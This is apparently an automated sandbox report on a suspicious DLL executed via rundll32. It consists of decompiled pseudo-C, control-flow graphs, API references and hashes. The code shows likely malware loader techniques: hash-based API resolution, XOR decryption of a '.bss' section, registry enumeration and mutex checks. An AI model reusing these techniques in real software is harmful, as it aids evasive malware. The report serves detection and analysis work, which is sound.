                  				if (E00000001180008B44(__ecx, __rax - _t217, __rax, __rbx, _t191, __rbx, _t214) != r12d) goto 0x8000540f;
                  				E00000001180007678(__ecx, __rax, _t154, _t191);
                  				E0000000118000459C(0xdc444c2b, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t146 == _t217) goto 0x80005144;
                  				r9d = 0;
                  				r8d = 0;
                  				 *_t146();
                  				goto 0x80005147;
                  				_t147 = _t217;
                  				 *(_t189 + 0x28) = _t147;
                  				if (_t147 != _t217) goto 0x8000515b;
                  				GetLastError();
                  				goto 0x80005408;
                  				r8d = 0x1102;
                  				HeapAlloc(??, ??, ??);
                  				_t192 =  *0x8000d4a0;
                  				if (_t192 == _t217) goto 0x80005226;
                  				 *_t192 = r12w; // executed
                  				_t55 = RegOpenKeyW(??, ??, ??); // executed
                  				if (_t55 != r12d) goto 0x80005216;
                  				goto 0x800051cf;
                  				r12d = r12d + 1;
                  				if (E00000001180009110(0x180000000, _t154, _t192, _t202 + 0x20, _t192, _t202 + 0x278, _t214) != 0) goto 0x800051ee;
                  				r9d = 0x104; // executed
                  				_t57 = RegEnumKeyW(??, ??, ??, ??); // executed
                  				if (_t57 == 0) goto 0x800051b6;
                  				r12d = 0;
                  				if (_t57 != 0x103) goto 0x80005203;
                  				 *0x8000d480 = _t192;
                  				RegCloseKey(??); // executed
                  				if (r12d == r12d) goto 0x80005234;
                  				HeapFree(??, ??, ??);
                  				goto 0x8000522b;
                  				if (8 != r12d) goto 0x8000540f;
                  				_t193 =  *0x8000d490;
                  				r8d = 8;
                  				memcpy(??, ??, ??);
                  				 *((intOrPtr*)(_t202 + 0x286)) = r12w;
                  				if (E00000001180005CA4(8, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x180011198) == r12d) goto 0x8000529c;
                  				if (E00000001180005CA4(_t61, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x1800111f0) != r12d) goto 0x8000540f;
                  				_t28 = _t189 + 8; // 0x8
                  				_t186 = _t28;
                  				if (E00000001180006DCC(_t154, _t189, _t28, _t189, _t193) != r12d) goto 0x800052e2;
                  				E00000001180003C24(_t154, _t189, _t28, _t189, _t193,  *0x8000d4a0);
                  				 *((long long*)(_t189 + 0x30)) = 0x180000000;
                  				if (0x180000000 == _t217) goto 0x800052e2;
                  				_t30 = _t189 + 8; // 0x8
                  				_t65 = E00000001180003C24(_t154, _t30, _t28, _t189, _t193,  *0x8000d4a0);
                  				 *((long long*)(_t189 + 0x38)) = 0x180000000;
                  				_t90 =  !=  ? r12d : 8;
                  				_t132 = ( !=  ? r12d : 8) - r12d;
                  				if (( !=  ? r12d : 8) != r12d) goto 0x8000540f;
                  				if (E00000001180008708(_t65, _t114, _t154, _t189, _t186) != r12d) goto 0x80005302;
                  				goto 0x8000540f;
                  				_t211 =  *0x8000d490 + 0x18000f000;
                  				r9d = _t211[1] & 0x0000ffff;
                  				r11d =  *_t211 & 0x0000ffff;
                  				_t215 = __r9 + 8;
                  				if (_t216 - _t215 <= 0) goto 0x80005339;
                  				if ((r14d ^ 0xe49a1e6d) == r12d) goto 0x8000533c;
                  				E00000001180004ED8(r14d ^ 0xe49a1e6d, __r9 +  &(_t211[4]));
                  				goto 0x8000533c;
                  				if (_t217 != _t217) goto 0x8000534b;
                  				goto 0x8000540f;
                  				r14d = r14d ^ 0xecb028fc;
                  				if (_t216 - _t215 <= 0) goto 0x8000536e;
                  				if (r14d == r12d) goto 0x80005371;
                  				E00000001180004ED8(r14d, __r9 +  &(_t211[4]));
                  				goto 0x80005371;
                  				_t153 = _t217;
                  				if (_t153 == _t217) goto 0x80005341;
                  				 *(_t189 + 0x40) = _t211;
                  				 *0x8000d488 = _t189;
                  				GetModuleHandleA(??);
                  				if (_t153 ==  *((intOrPtr*)(_t202 + 0x270))) goto 0x800053fb;
                  				E0000000118000459C(0xaade337c, _t153,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t153 == _t217) goto 0x800053be;
                  				r8d = GetCurrentThreadId();
                  				 *_t153();
                  				goto 0x800053c1;
                  				if (_t217 == _t217) goto 0x80005150;
                  				E0000000118000459C(0x1c8cff93, _t153,  *((intOrPtr*)(_t199 + 0x18)));
                  				if (_t153 == _t217) goto 0x800053ee;
                  				 *_t153();
                  				goto 0x800053f1;
                  				if (r12d != r12d) goto 0x8000541e;
                  				goto 0x80005150;
                  				asm("lock add dword [ebp+0x38], 0x1");
                  				if (E00000001180002B60(_t115, _t189, __r9, _t215, _t216) == r12d) goto 0x8000541e;
                  				E00000001180005578(_t154, _t189, _t217);
                  				goto 0x8000541e;
                  				return 8;
                  			}





























                  0x18000508c
                  0x18000508c
                  0x18000508c
                  0x18000508c
                  0x180005091
                  0x1800050a1
                  0x1800050a8
                  0x1800050b6
                  0x1800050cb
                  0x1800050d1
                  0x1800050d4
                  0x1800050da
                  0x1800050e8
                  0x1800050f1
                  0x1800050f7
                  0x1800050f7
                  0x1800050fe
                  0x180005101
                  0x180005112
                  0x18000511b
                  0x180005129
                  0x180005131
                  0x180005138
                  0x18000513b
                  0x180005140
                  0x180005142
                  0x180005144
                  0x180005147
                  0x18000514e
                  0x180005150
                  0x180005156
                  0x180005164
                  0x180005171
                  0x180005177
                  0x180005184
                  0x1800051a1
                  0x1800051a5
                  0x1800051b0
                  0x1800051b4
                  0x1800051be
                  0x1800051ca
                  0x1800051dc
                  0x1800051e2
                  0x1800051ec
                  0x1800051ee
                  0x1800051f7
                  0x1800051f9
                  0x18000520b
                  0x180005214
                  0x18000521e
                  0x180005224
                  0x18000522e
                  0x180005234
                  0x180005248
                  0x18000524e
                  0x18000526d
                  0x180005280
                  0x18000529f
                  0x1800052a5
                  0x1800052a5
                  0x1800052b6
                  0x1800052c0
                  0x1800052c5
                  0x1800052cc
                  0x1800052ce
                  0x1800052d2
                  0x1800052da
                  0x1800052de
                  0x1800052e2
                  0x1800052e5
                  0x1800052f6
                  0x1800052fd
                  0x180005302
                  0x18000530d
                  0x180005312
                  0x18000531c
                  0x180005323
                  0x18000532d
                  0x180005332
                  0x180005337
                  0x18000533f
                  0x180005346
                  0x18000534b
                  0x180005355
                  0x18000535f
                  0x180005367
                  0x18000536c
                  0x18000536e
                  0x180005374
                  0x180005378
                  0x18000537c
                  0x180005383
                  0x180005391
                  0x18000539c
                  0x1800053a7
                  0x1800053b4
                  0x1800053b7
                  0x1800053bc
                  0x1800053c4
                  0x1800053d3
                  0x1800053db
                  0x1800053ea
                  0x1800053ec
                  0x1800053f4
                  0x1800053f6
                  0x1800053fb
                  0x18000540d
                  0x180005412
                  0x180005417
                  0x18000543a

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: HandleModule$Heap$AllocErrorLast$CloseCriticalCurrentEnumFreeInitializeOpenSectionThreadmemcpymemset
                  • String ID:
                  • API String ID: 2014251338-0
                  • Opcode ID: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
                  • Instruction ID: 9261d350846713a6d61e62943f4705d1cd3b2ba236d4958cf944a875f2eb3085
                  • Opcode Fuzzy Hash: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
                  • Instruction Fuzzy Hash: 1AA15C32204B4D92EAE6DB22E4953EE7391B78C7C5F50C421EA8A47795DE78CB9DC301
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorFileLast$CloseCreateDirectoryHandleInitQueryStringUnicode
                  • String ID:
                  • API String ID: 2375947951-0
                  • Opcode ID: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
                  • Instruction ID: 86e8c0801eecd6214d3de86c7c9a3f36e2355b629a028b10123d7888b335a31b
                  • Opcode Fuzzy Hash: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
                  • Instruction Fuzzy Hash: A5319E72214B8486D7A1CF15E45439E77A1F78CBD4F588626EAAD43B88DF38CA48CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 38%
                  			E00000001180004F1C(long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r11) {
                  				intOrPtr _t22;
                  				intOrPtr _t23;
                  				void* _t46;
                  				long long _t56;
                  				void* _t72;
                  				intOrPtr* _t75;
                  				intOrPtr* _t76;
                  				long long _t80;
                  				long long _t82;
                  				void* _t83;
                  				long long _t85;
                  				void* _t91;
                  				void* _t92;
                  				long _t93;
                  				long _t95;
                  				long _t97;
                  
                  				_t92 = __r11;
                  				_t56 = _t85;
                  				 *((long long*)(_t56 + 8)) = __rbx;
                  				 *((long long*)(_t56 + 0x10)) = _t82;
                  				 *((long long*)(_t56 + 0x18)) = __rsi;
                  				 *((long long*)(_t56 + 0x20)) = __rdi;
                  				_t83 = __rcx;
                  				r8d = 0;
                  				HeapCreate(_t97, _t95, _t93); // executed
                  				_t80 = _t56;
                  				if (_t56 == 0) goto 0x8000506b;
                  				_t72 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
                  				_t75 = _t56 + _t72 + 0x68;
                  				_t22 =  *_t75;
                  				if (_t22 == 0) goto 0x80004ffc;
                  				if (_t22 == 0x7373622e) goto 0x80004f8a;
                  				_t76 = _t75 + 0x28;
                  				_t23 =  *_t76;
                  				if (_t23 != 0) goto 0x80004f79;
                  				if (_t23 == 0) goto 0x80004ffc;
                  				r13d =  *(_t76 + 0x10);
                  				r12d =  *(_t76 + 0x14);
                  				r12d = r12d ^  *(_t72 + 8);
                  				r12d = r12d ^ r13d;
                  				HeapAlloc(??, ??, ??);
                  				if (_t56 == 0) goto 0x80004ff5;
                  				r9d = r12d;
                  				r8d = r13d;
                  				E00000001180002524(_t56, __rbx, _t56, _t72 + __rcx, _t80);
                  				r11d =  *((intOrPtr*)(_t76 + 0xc));
                  				 *0x8000d490 = _t56 - _t92 - _t83;
                  				 *0x8000d498 = E00000001180001B48(_t56, _t56 - _t92 - _t83 + 0x80011040);
                  				goto 0x80005001;
                  				goto 0x80005001;
                  				if (2 == 0) goto 0x80005010;
                  				HeapDestroy(??);
                  				goto 0x8000506b;
                  				HeapAlloc(??, ??, ??);
                  				if (0x80011040 != 0) goto 0x80005049;
                  				HeapDestroy(??);
                  				goto 0x8000506b;
                  				0x8000236a();
                  				 *0x180011048 = _t80;
                  				 *0x8000d4a0 = 0x80011040;
                  				return E0000000118000508C(0, _t46, 0x80011040, 0x80011040, _t83, _t91);
                  			}



















                  0x180004f1c
                  0x180004f1c
                  0x180004f1f
                  0x180004f23
                  0x180004f27
                  0x180004f2b
                  0x180004f39
                  0x180004f3c
                  0x180004f4b
                  0x180004f51
                  0x180004f57
                  0x180004f63
                  0x180004f6a
                  0x180004f6f
                  0x180004f73
                  0x180004f7e
                  0x180004f80
                  0x180004f84
                  0x180004f88
                  0x180004f8c
                  0x180004f8e
                  0x180004f92
                  0x180004f99
                  0x180004fa2
                  0x180004fa5
                  0x180004fb1
                  0x180004fb6
                  0x180004fb9
                  0x180004fc2
                  0x180004fc7
                  0x180004fdd
                  0x180004fed
                  0x180004ff3
                  0x180004ffa
                  0x180005003
                  0x180005008
                  0x18000500e
                  0x18000502b
                  0x180005037
                  0x18000503c
                  0x180005047
                  0x180005051
                  0x180005059
                  0x18000505d
                  0x18000508b

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocDestroy$Create
                  • String ID: .bss
                  • API String ID: 388876957-3890483948
                  • Opcode ID: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
                  • Instruction ID: 17f0f38e5d9243197e023c83d38f09e6848a0c07c4c3a118f17cd0d0cedb6ef9
                  • Opcode Fuzzy Hash: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
                  • Instruction Fuzzy Hash: 68418B72300B4986FB96CB56A8543AA73A0FB4CFD4F04C025EE494BB81DF38DA998710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 44%
                  			E00000001180008708(void* __eax, void* __edi, long long __rbx, intOrPtr* __rcx, void* __rdx, void* _a8, char _a16, long long _a24) {
                  				void* _v72;
                  				long long _v88;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t45;
                  				long long _t46;
                  				long long _t47;
                  				struct _SECURITY_ATTRIBUTES* _t57;
                  				long long _t60;
                  				int _t62;
                  				WCHAR* _t66;
                  				void* _t69;
                  				void* _t76;
                  				void* _t79;
                  
                  				_t47 = __rbx;
                  				_t45 = _t69;
                  				 *((long long*)(_t45 + 8)) = __rbx;
                  				r9d = 0;
                  				 *((intOrPtr*)(_t45 - 0x48)) = 0x18;
                  				 *((intOrPtr*)(_t45 - 0x38)) = 0;
                  				0x800085dc(); // executed
                  				if (__eax == 0) goto 0x800087f7;
                  				_a16 =  *__rcx;
                  				_t46 =  &_a24;
                  				r9d = 0;
                  				_v88 = _t46;
                  				E000000011800030C8(__edi, __rbx,  &_a16,  *0x8000d490, __rcx,  *0x8000d490 + 0x180011188, _t79, _t76);
                  				if (_t46 == _t47) goto 0x800087f7;
                  				E0000000118000459C(0x3ff22481, _t46,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t46 == _t47) goto 0x800087c0;
                  				CreateMutexW(_t57, _t62, _t66); // executed
                  				goto 0x800087c3;
                  				_t60 = _t47;
                  				if (_t60 == _t47) goto 0x800087e9;
                  				if (GetLastError() != 0xb7) goto 0x800087e0;
                  				FindCloseChangeNotification(??); // executed
                  				goto 0x800087e9;
                  				_a24 = _t60;
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}

















                  0x180008708
                  0x180008708
                  0x18000870b
                  0x180008747
                  0x18000874a
                  0x180008751
                  0x180008754
                  0x18000875b
                  0x18000876f
                  0x180008776
                  0x180008786
                  0x180008789
                  0x18000878e
                  0x180008799
                  0x1800087a4
                  0x1800087ac
                  0x1800087b9
                  0x1800087be
                  0x1800087c0
                  0x1800087c6
                  0x1800087d3
                  0x1800087d8
                  0x1800087de
                  0x1800087e0
                  0x1800087f1
                  0x18000880c

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorHeapLastmemcpy$AllocChangeCloseCreateFindFreeMutexNotificationlstrlen
                  • String ID:
                  • API String ID: 4170216436-0
                  • Opcode ID: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
                  • Instruction ID: 127f5c0fcc647b7374bd47b38eb5124d32550bc361860966e3f5016e667268f0
                  • Opcode Fuzzy Hash: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
                  • Instruction Fuzzy Hash: B621593220468996EBA1CF52E8407D977A1FB8CBC8F588426EF4D47B49DE34D64EC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 149 180007b94-180007be5 150 180007da3 149->150 151 180007beb-180007bf3 149->151 152 180007da8-180007db8 150->152 151->150 153 180007bf9-180007c24 RtlAllocateHeap 151->153 154 180007c2a-180007c63 memset 153->154 155 180007d9c-180007da1 153->155 156 180007c69-180007c93 154->156 157 180007d6d-180007d85 154->157 155->152 159 180007c98-180007c9b 156->159 161 180007d87-180007d8a 157->161 162 180007d8c-180007d9a HeapFree 157->162 159->157 160 180007ca1-180007caa 159->160 163 180007cd6-180007ce7 160->163 164 180007cac-180007cd1 call 180008c48 160->164 161->152 162->152 166 180007ce9-180007ced 163->166 167 180007d1d-180007d68 163->167 164->163 169 180007cfa-180007d02 166->169 170 180007cef-180007cf8 166->170 167->159 171 180007d07-180007d0e 169->171 170->171 171->166 172 180007d10-180007d18 171->172 172->167
                  APIs
                  • RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
                  • memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocateHeapmemset
                  • String ID:
                  • API String ID: 669713250-0
                  • Opcode ID: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
                  • Instruction ID: b8eae849a3001c6edc556b20ee36b044cea257758f74ce9d79c82757b9587b00
                  • Opcode Fuzzy Hash: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
                  • Instruction Fuzzy Hash: 7F518C72B04B8486E7A6CB05E444B9AB7B1FB98BD4F508116EE8D43B54DF38C9A5CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 173 180002464-180002482 LoadLibraryA 174 180002484-180002495 call 180007b94 173->174 175 1800024af-1800024b5 GetLastError 173->175 179 1800024a4-1800024ad FreeLibrary 174->179 180 180002497-1800024a2 174->180 177 1800024b7-1800024c8 175->177 179->177 180->177
                  C-Code - Quality: 25%
                  			E00000001180002464(void* __rax, long long __rbx, long long* __rdx, long long __rsi, long long _a8, long long _a16, void* _a24) {
                  				long long _t20;
                  				void* _t24;
                  				void* _t31;
                  				void* _t32;
                  
                  				_a8 = __rbx;
                  				_a16 = __rsi;
                  				LoadLibraryA(??); // executed
                  				_t24 = __rax;
                  				if (__rax == 0) goto 0x800024af;
                  				if (E00000001180007B94(__rax,  &_a24, _t31, _t32) != 0) goto 0x800024a4;
                  				_t20 = _a24;
                  				 *_t20 = _t24;
                  				 *__rdx = _t20;
                  				goto 0x800024b7;
                  				FreeLibrary(??);
                  				goto 0x800024b7;
                  				return GetLastError();
                  			}







                  0x180002464
                  0x180002469
                  0x180002476
                  0x18000247c
                  0x180002482
                  0x180002495
                  0x180002497
                  0x18000249c
                  0x18000249f
                  0x1800024a2
                  0x1800024a7
                  0x1800024ad
                  0x1800024c8

                  APIs
                  • LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                  • GetLastError.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024AF
                    • Part of subcall function 0000000180007B94: RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
                    • Part of subcall function 0000000180007B94: memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35
                  • FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Library$AllocateErrorFreeHeapLastLoadmemset
                  • String ID:
                  • API String ID: 105124555-0
                  • Opcode ID: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
                  • Instruction ID: 15b41fa467f29f274ac49399cf4168cd092f7d47ffdb68e5546afb005077a2c4
                  • Opcode Fuzzy Hash: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
                  • Instruction Fuzzy Hash: 6EF01231705B8982EB96CB55B5543A973A4BB9CBD0F54C020FB5943B49EF38C559C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 181 180006dcc-180006e1f call 1800089e4 184 180006e21-180006e36 lstrlenW 181->184 185 180006e8a 181->185 186 180006e38-180006e4d lstrcmpiW 184->186 187 180006e4f-180006e77 call 180002594 184->187 188 180006e8f-180006eaf 185->188 186->187 189 180006e7a-180006e88 HeapFree 186->189 187->189 189->188
                  C-Code - Quality: 67%
                  			E00000001180006DCC(long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi) {
                  				int _t27;
                  				void* _t46;
                  				long long _t48;
                  				intOrPtr* _t63;
                  				long long _t65;
                  				intOrPtr* _t66;
                  				void* _t68;
                  				void* _t69;
                  				void* _t71;
                  				void* _t74;
                  				WCHAR* _t77;
                  				WCHAR* _t80;
                  
                  				_t48 = __rbx;
                  				_t46 = _t68;
                  				 *((long long*)(_t46 + 8)) = __rbx;
                  				 *((long long*)(_t46 + 0x10)) = _t65;
                  				 *((long long*)(_t46 + 0x18)) = __rsi;
                  				 *((long long*)(_t46 + 0x20)) = __rdi;
                  				_t69 = _t68 - 0x30;
                  				_t63 = __rcx;
                  				_t66 = __rdx;
                  				E000000011800089E4(__rbx,  *0x8000d490 + 0x180011220, __rdx, __rdi, __rcx, _t71);
                  				if ( *0x8000d4a0 == _t48) goto 0x80006e8a;
                  				 *_t66 =  *_t63;
                  				if (lstrlenW(_t80) - 0xe <= 0) goto 0x80006e4f;
                  				_t27 = lstrcmpiW(_t77); // executed
                  				if (_t27 == 0) goto 0x80006e7a;
                  				E00000001180002594(_t26, _t48,  *0x8000d4a0, _t63, _t69 + 0x20, _t74);
                  				r11d =  *((intOrPtr*)(_t69 + 0x20));
                  				 *_t66 =  *_t66 +  *((intOrPtr*)(_t69 + 0x24)) + r11d;
                  				 *((intOrPtr*)(_t66 + 4)) =  *((intOrPtr*)(_t66 + 4)) +  *((intOrPtr*)(_t69 + 0x28)) +  *((intOrPtr*)(_t69 + 0x2c));
                  				HeapFree(??, ??, ??);
                  				goto 0x80006e8f;
                  				return 8;
                  			}















                  0x180006dcc
                  0x180006dcc
                  0x180006dcf
                  0x180006dd3
                  0x180006dd7
                  0x180006ddb
                  0x180006de5
                  0x180006df7
                  0x180006dfe
                  0x180006e12
                  0x180006e1f
                  0x180006e24
                  0x180006e36
                  0x180006e45
                  0x180006e4d
                  0x180006e59
                  0x180006e5e
                  0x180006e6e
                  0x180006e77
                  0x180006e82
                  0x180006e88
                  0x180006eaf

                  APIs
                    • Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D
                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E2B
                  • lstrcmpiW.KERNELBASE(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E45
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E82
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrcmpilstrlen
                  • String ID:
                  • API String ID: 727816722-0
                  • Opcode ID: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
                  • Instruction ID: d0415e672ad6f4a9c89e0efb1880c6926a1671767ff9eca089c1e6ebc0bc87c8
                  • Opcode Fuzzy Hash: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
                  • Instruction Fuzzy Hash: 7B216D36600B8896D751DB16E84039AB3A1F78CBD8F48C122FE4D83758DF38CA4ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 192 1817be03edc-1817be0405d 194 1817be0402a-1817be040ae 192->194 195 1817be0405f-1817be04069 192->195 199 1817be040a0-1817be040a8 194->199 200 1817be040b0-1817be040b8 194->200 197 1817be04004-1817be0400f 195->197 198 1817be03f96-1817be03fae call 1817be04d69 197->198 214 1817be03f1a-1817be03fdb 198->214 215 1817be03f2b-1817be03f31 198->215 207 1817be04045-1817be04253 199->207 201 1817be04020-1817be0409b call 1817be04faa 200->201 212 1817be04255-1817be04257 207->212 213 1817be04240-1817be0424b 207->213 216 1817be0423b-1817be0423f 212->216 220 1817be03f87-1817be03f94 214->220 221 1817be03fdd-1817be03fea 214->221 215->214 218 1817be03f33-1817be03f85 215->218 218->220 218->221 220->198 224 1817be03f5d-1817be03f69 call 1817be04929 220->224 222 1817be03fec-1817be04002 221->222 223 1817be03fc0-1817be03fc9 221->223 222->197 222->207 223->214 228 1817be03fb3-1817be03fbe 224->228 229 1817be03f6b-1817be03f75 call 1817be04929 224->229 228->229 232 1817be04114-1817be04121 229->232 233 1817be040f3-1817be04100 call 1817be05141 232->233 234 1817be04123-1817be0412f 232->234 233->234 240 1817be04102-1817be0410f call 1817be04e98 233->240 236 1817be04131-1817be04139 234->236 237 1817be040e6-1817be040f1 234->237 236->240 241 1817be0413b-1817be04146 236->241 237->233 238 1817be040db-1817be040e4 237->238 238->237 242 1817be040bd-1817be040cc RtlAllocateHeap 238->242 240->232 244 1817be04164-1817be04175 241->244 242->241 245 1817be040ce-1817be040d6 242->245 244->216 245->244 248 1817be041d8-1817be041df 245->248 249 1817be041e1-1817be041ea 248->249 250 1817be041ec-1817be041f8 248->250 249->250 252 1817be04204-1817be04213 call 1817be04e98 249->252 253 1817be04215-1817be04220 250->253 254 1817be041fa-1817be04202 250->254 252->253 257 1817be04222-1817be0422b call 1817be05141 252->257 253->254 253->257 254->252 255 1817be041cb-1817be041cf 254->255 255->248 257->244
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.246593864.000001817BE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001817BE00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1817be00000_rundll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: R
                  • API String ID: 0-1466425173
                  • Opcode ID: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
                  • Instruction ID: 20cdb0d890fdd51447cc2a5b760136e6336927b485a7a87d006693e04035c982
                  • Opcode Fuzzy Hash: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
                  • Instruction Fuzzy Hash: 17813232218644AFE7A4DB188655FE976F5FB98340FB4C45DE28AC33D1DF218E869702
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
